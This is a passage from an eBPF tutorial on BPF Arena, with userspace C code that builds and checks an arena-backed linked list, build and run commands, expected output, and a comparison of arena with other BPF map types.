&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;list_for_each_entry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;test_arena_list_add_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;LIBBPF_OPTS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;uint64_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;arena_list_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open and load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_prog_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arena_list_add&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to run arena_list_add: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;retval&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"arena_list_add returned %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;retval&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;skip&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"SKIP: compiler doesn't support arena_cast&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum of elements: %d (expected: %d)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_prog_test_run_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_program__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;arena_list_del&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to run arena_list_del: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum after deletion: %d (expected: 0)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Sum computed by BPF: %d (expected: %d)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

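    &lt;span class="cm"&gt;/* Only report success when both post-deletion checks hold. */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;list_sum&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;expected_sum&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Test failed!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Test passed!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;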
&lt;span class="nl"&gt;out:&lt;/span&gt;
    &lt;span class="n"&gt;arena_list_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Invalid count: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Testing arena list with %d elements&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;test_arena_list_add_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program demonstrates zero-copy access to arena memory. When we load the BPF skeleton using &lt;code&gt;arena_list_bpf__open_and_load()&lt;/code&gt;, libbpf automatically &lt;code&gt;mmap()&lt;/code&gt;s the arena into userspace. The pointer &lt;code&gt;skel-&amp;gt;bss-&amp;gt;list_head&lt;/code&gt; points directly into this mapped arena memory.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;list_sum()&lt;/code&gt; function walks the linked list from userspace. Notice we're using the same &lt;code&gt;list_for_each_entry()&lt;/code&gt; macro as the BPF code. The list is in arena memory, shared between kernel and userspace. Userspace can directly dereference arena pointers to access node values and follow &lt;code&gt;next&lt;/code&gt; pointers - no syscalls needed. This is the zero-copy benefit: userspace reads memory directly from the mapped region.&lt;/p&gt;

&lt;p&gt;The test flow orchestrates the demonstration. First, we set &lt;code&gt;skel-&amp;gt;bss-&amp;gt;cnt&lt;/code&gt; to specify how many list elements to create. Then &lt;code&gt;bpf_prog_test_run_opts()&lt;/code&gt; executes the &lt;code&gt;arena_list_add&lt;/code&gt; BPF program, which builds the list in arena memory. Once that returns, userspace immediately calls &lt;code&gt;list_sum()&lt;/code&gt; to verify the list by walking it directly from userspace - no syscalls, just direct memory access. The expected sum is calculated as 0+1+2+...+(cnt-1), which equals cnt*(cnt-1)/2.&lt;/p&gt;

&lt;p&gt;After verifying the list, we run &lt;code&gt;arena_list_del&lt;/code&gt; to remove all elements. This BPF program walks the list, computes its own sum, and calls &lt;code&gt;bpf_free()&lt;/code&gt; on each node. Userspace then verifies the list is empty by calling &lt;code&gt;list_sum()&lt;/code&gt; again, which should return 0. We also check that &lt;code&gt;skel-&amp;gt;bss-&amp;gt;list_sum&lt;/code&gt; matches our expected value, confirming the BPF program computed the correct sum before deleting nodes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding Arena Memory Allocation
&lt;/h2&gt;

&lt;p&gt;The arena allocator deserves a closer look because it shows how BPF programs can implement sophisticated memory management in arena space. The allocator in &lt;code&gt;bpf_arena_alloc.h&lt;/code&gt; uses a per-CPU page fragment approach to avoid locking.&lt;/p&gt;

&lt;p&gt;Each CPU maintains its own current page and offset. When you call &lt;code&gt;bpf_alloc(size)&lt;/code&gt;, it first rounds the size up to a multiple of 8 bytes. If the current page has enough space below the current offset, it allocates from there by decrementing the offset and returning a pointer. If not enough space remains, it allocates a fresh page using &lt;code&gt;bpf_arena_alloc_pages()&lt;/code&gt;, a kernel function (kfunc) that obtains arena pages from the kernel's page allocator. Each page keeps a reference count in its last 8 bytes, tracking how many live objects were allocated from that page.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_free(addr)&lt;/code&gt; function implements reference-counted deallocation. It rounds the address down to the page boundary, finds the reference count, and decrements it. When the count reaches zero - meaning all objects allocated from that page have been freed - it returns the entire page to the kernel using &lt;code&gt;bpf_arena_free_pages()&lt;/code&gt;. This page-level reference counting means individual &lt;code&gt;bpf_free()&lt;/code&gt; calls are fast, and memory is returned to the system only when appropriate.&lt;/p&gt;

&lt;p&gt;This allocator design avoids locks by using per-CPU state. Because a BPF program stays on one CPU for the duration of a run, it can use that CPU's page fragment without synchronizing with other CPUs. This keeps &lt;code&gt;bpf_alloc()&lt;/code&gt; fast: in the common case it only rounds the size, moves the offset within the current page, and returns a pointer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_arena directory and build the example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_arena
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with &lt;code&gt;-D__BPF_FEATURE_ADDR_SPACE_CAST&lt;/code&gt; to enable arena pointer support. It uses &lt;code&gt;bpftool gen object&lt;/code&gt; to process the compiled BPF object, and the skeleton header that userspace includes (&lt;code&gt;arena_list.skel.h&lt;/code&gt;) is then generated from it with &lt;code&gt;bpftool gen skeleton&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Run the arena list test with 10 elements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./arena_list 10
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Testing arena list with 10 elements
Sum of elements: 45 (expected: 45)
Sum after deletion: 0 (expected: 0)
Sum computed by BPF: 45 (expected: 45)

Test passed!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Try it with more elements to see arena scaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./arena_list 100
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The sum should be 4950 (100*99/2), since the elements are the integers 0 through 99. Notice that userspace can verify the list by directly accessing arena memory without any syscalls. This zero-copy access is what makes arena powerful for large data structures.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Arena vs Other BPF Maps
&lt;/h2&gt;

&lt;p&gt;Choosing the right BPF map type depends on your access patterns and data structure needs. &lt;strong&gt;Use regular BPF maps&lt;/strong&gt; (hash, array, etc.) when you need simple key-value storage, small data structures that fit well in maps, standard map operations like atomic updates, or per-CPU statistics without complex linking. Maps excel at straightforward use cases with kernel-provided operations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use BPF Arena&lt;/strong&gt; when you need complex linked structures like lists, trees, or graphs, large shared memory exceeding typical map sizes, zero-copy userspace access to avoid syscall overhead, or custom memory management beyond what maps provide. Arena shines for sophisticated data structures where pointer operations are natural.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Ring Buffers&lt;/strong&gt; when you need one-way streaming from BPF to userspace, event logs or trace data, or sequentially processed data without random access. Ring buffers are optimized for high-throughput event streams but don't support bidirectional access or complex data structures.&lt;/p&gt;

&lt;p&gt;The arena vs maps trade-off fundamentally comes down to pointers and access patterns. If you find yourself encoding indices to simulate pointers in BPF maps, arena is probably the better choice. If you need large-scale data structures accessible from both kernel and userspace, arena's zero-copy shared memory model is hard to beat.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF Arena solves a fundamental limitation of traditional BPF maps by providing sparse shared memory where you can use real C pointers to build complex data structures. Created by Alexei Starovoitov in 2024, arena enables linked lists, trees, graphs, and custom allocators using normal pointer operations instead of awkward integer indices. Both kernel BPF programs and userspace can map the same arena for zero-copy bidirectional access, eliminating syscall overhead.&lt;/p&gt;

&lt;p&gt;Our linked list example demonstrates the core arena concepts: defining an arena map, using &lt;code&gt;__arena&lt;/code&gt; annotations for pointer types, allocating memory with &lt;code&gt;bpf_alloc()&lt;/code&gt;, and accessing the same data structure from both kernel and userspace. The per-CPU page fragment allocator shows how BPF programs can implement sophisticated memory management in arena space. Arena unlocks new possibilities for in-kernel data structures, key-value store accelerators, and large-scale data aggregation up to 4GB.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Original Arena Patches:&lt;/strong&gt; &lt;a href="https://lwn.net/Articles/961594/" rel="noopener noreferrer"&gt;https://lwn.net/Articles/961594/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Meta's Arena Examples:&lt;/strong&gt; Linux kernel tree &lt;code&gt;tools/testing/selftests/bpf/progs/arena_*.c&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Kernel Source:&lt;/strong&gt; &lt;code&gt;kernel/bpf/arena.c&lt;/code&gt; - Arena implementation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLVM Address Spaces:&lt;/strong&gt; Documentation on &lt;code&gt;__arena&lt;/code&gt; compiler support&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This example is adapted from Meta's arena_list.c in the Linux kernel samples, with educational enhancements. Requires Linux kernel 6.10+ with &lt;code&gt;CONFIG_BPF_ARENA=y&lt;/code&gt; enabled. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>arena</category>
      <category>memory</category>
    </item>
    <item>
